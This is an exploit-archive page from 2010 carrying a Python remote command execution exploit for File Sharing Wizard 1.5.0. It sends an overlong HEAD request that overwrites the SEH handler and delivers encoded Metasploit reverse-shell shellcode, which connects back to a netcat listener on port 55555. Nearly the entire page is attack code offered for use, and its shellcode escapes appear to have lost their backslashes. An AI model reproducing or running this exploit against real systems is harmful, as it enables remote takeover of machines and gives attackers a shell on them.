File Sharing Wizard Version 1.5.0

Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>File Sharing Wizard Version 1.5.0</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================
File Sharing Wizard Version 1.5.0
=================================


#!/usr/bin/python
 
 
print &quot;
##########################################################&quot;
print &quot;##       Team Hackers Garage         ##&quot;
print &quot;##       (www.garage4hackers.com)        ##&quot;
print &quot;##                           ##&quot;
print &quot;##   File Sharing Wizard Version 1.5.0       ##&quot;
print &quot;##       Remote Command Execution        ##&quot;
print &quot;##               Author: b0nd            ##&quot;
print &quot;##       (sumit.iips@gmail.com)          ##&quot;
print &quot;##                                           ##&quot;
print &quot;##   Greetz to: The Hackers Garage Family        ##&quot;
print &quot;##   Thanks to: www.exploit-db.com/author/m1k3/  ##&quot;
print &quot;##                           ##&quot;
print &quot;##           &amp;               ##&quot;
print &quot;##                           ##&quot;
print &quot;##       Peter Van (CORELAN TEAM)        ##&quot;
print &quot;##                           ##&quot;
print &quot;###########################################################&quot;
 
 
# http://www.sharing-file.net/
# File Sharing Wizard Version 1.5.0 build on 26-8-2008
 
# Summary: The &quot;HEAD&quot; command leads to SEH overwrite and ultimately remote system compromise
# Tested on: Windows XP SP2
# SEH Overwrite and shellcode pointed out by EBP
# Huge space for shellcode.
 
 
import socket
import sys
 
if len(sys.argv) &lt; 2:
    print &quot;Usage: exploit-code.py &lt;Remote-IP-Address&gt; &lt;Remote-Port&gt;&quot;
    sys.exit(1)
 
ips = sys.argv[1]
port = int(sys.argv[2])
 
 
string = &quot;A&quot;*1040
string += &quot;x90x90x1dxeb&quot;    # nSEH --&gt; Jump to Shellcode
string += &quot;x29xE3xD3x74&quot;    # pop pop ret from oledlg.dll (SafeSEH OFF)
string += &quot;x90&quot;*16     # Nop's
 
#win32_reverse -  EXITFUNC=seh LHOST=192.168.96.1 LPORT=55555 Size=649 Encoder=PexAlphaNum http://metasploit.com */
#Thumb rule - Don't trust the shellcode ;)
string += (&quot;xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49&quot; +
&quot;x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36&quot; +
&quot;x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34&quot; +
&quot;x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41&quot; +
&quot;x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e&quot; +
&quot;x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38&quot; +
&quot;x4ex56x46x42x46x32x4bx48x45x44x4ex43x4bx38x4ex47&quot; +
&quot;x45x30x4ax37x41x50x4fx4ex4bx38x4fx44x4ax31x4bx48&quot; +
&quot;x4fx35x42x32x41x50x4bx4ex49x44x4bx38x46x53x4bx38&quot; +
&quot;x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c&quot; +
&quot;x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e&quot; +
&quot;x46x4fx4bx53x46x45x46x42x4ax32x45x47x45x4ex4bx38&quot; +
&quot;x4fx35x46x32x41x50x4bx4ex48x46x4bx58x4ex50x4bx34&quot; +
&quot;x4bx58x4fx55x4ex41x41x30x4bx4ex43x30x4ex32x4bx48&quot; +
&quot;x49x48x4ex56x46x42x4ex31x41x36x43x4cx41x53x4bx4d&quot; +
&quot;x46x46x4bx58x43x54x42x53x4bx48x42x54x4ex50x4bx48&quot; +
&quot;x42x47x4ex41x4dx4ax4bx38x42x54x4ax30x50x55x4ax36&quot; +
&quot;x50x58x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x36&quot; +
&quot;x43x45x48x36x4ax36x43x43x44x53x4ax36x47x57x43x57&quot; +
&quot;x44x53x4fx35x46x35x4fx4fx42x4dx4ax56x4bx4cx4dx4e&quot; +
&quot;x4ex4fx4bx43x42x35x4fx4fx48x4dx4fx45x49x58x45x4e&quot; +
&quot;x48x56x41x38x4dx4ex4ax30x44x30x45x55x4cx36x44x50&quot; +
&quot;x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55&quot; +
&quot;x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x44x43x55&quot; +
&quot;x43x44x43x45x4fx4fx42x4dx4ax56x42x4cx4ax4ax42x56&quot; +
&quot;x41x50x48x56x4ax36x49x4dx43x50x48x36x43x45x49x38&quot; +
&quot;x41x4ex45x59x4ax46x4ex4ex49x4fx4cx4ax42x56x47x35&quot; +
&quot;x4fx4fx48x4dx4cx56x42x41x41x55x45x35x4fx4fx42x4d&quot; +
&quot;x48x56x4cx46x46x36x48x36x4ax46x43x36x4dx56x4cx46&quot; +
&quot;x42x55x49x35x49x52x4ex4cx49x58x47x4ex4cx36x46x54&quot; +
&quot;x49x58x44x4ex41x33x42x4cx43x4fx4cx4ax45x39x49x48&quot; +
&quot;x4dx4fx50x4fx44x44x4dx42x50x4fx44x44x4ex52x4dx48&quot; +
&quot;x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax36x44x57x50x4f&quot; +
&quot;x43x4bx48x41x4fx4fx45x57x4ax42x4fx4fx48x4dx4bx55&quot; +
&quot;x47x45x44x35x41x55x41x55x41x35x4cx46x41x30x41x45&quot; +
&quot;x41x35x45x35x41x55x4fx4fx42x4dx4ax56x4dx4ax49x4d&quot; +
&quot;x45x50x50x4cx43x55x4fx4fx48x4dx4cx56x4fx4fx4fx4f&quot; +
&quot;x47x53x4fx4fx42x4dx4ax56x47x4ex49x57x48x4cx49x47&quot; +
&quot;x4fx4fx45x57x46x50x4fx4fx48x4dx4fx4fx47x47x4ex4f&quot; +
&quot;x4fx4fx42x4dx4ax56x42x4fx4cx48x46x30x4fx35x43x45&quot; +
&quot;x4fx4fx48x4dx4fx4fx42x4dx5a&quot;);
 
string += &quot;D&quot;*4000 # Some more junk
 
print &quot;Launching remote BoF on&quot;, ips
print &quot;&quot;
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    connect=s.connect((ips, port))
except:
    print &quot;no connection possible&quot;
    sys.exit(1)
 
print &quot;
sending payload&quot;
print &quot;...&quot;
 
payload = (
'HEAD %s HTTP/1.0
'
'
') % (string)
 
 
s.send(payload)
s.close()
 
print &quot;Check your netcat listening on TCP port 55555 for reverse connect shell
&quot;
print &quot;%s pwned!&quot; % (ips)


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20